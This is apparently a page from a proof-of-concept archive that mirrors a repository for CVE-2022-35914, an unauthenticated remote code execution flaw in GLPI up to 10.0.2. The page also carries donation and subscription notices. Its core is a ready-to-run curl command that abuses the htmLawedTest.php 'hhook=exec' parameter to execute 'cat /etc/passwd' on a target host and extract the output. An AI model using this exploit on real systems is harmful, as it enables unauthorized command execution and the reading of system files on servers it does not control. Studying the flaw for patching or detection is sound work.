Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-35914 PoC — GLPI 注入漏洞

Source
Associated Vulnerability
Title:GLPI 注入漏洞 (CVE-2022-35914)
Description:/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.
Description
Unauthenticated RCE in GLPI 10.0.2
Readme
# CVE-2022-35914
Unauthenticated RCE in GLPI 10.0.2

# PoC

```
curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://{{HOST}}/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'
```
File Snapshot

[4.0K] /data/pocs/c540df2cfd0dee3947f5a571e67e73ce7492b1c4 ├── [1.0K] LICENSE └── [ 281] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →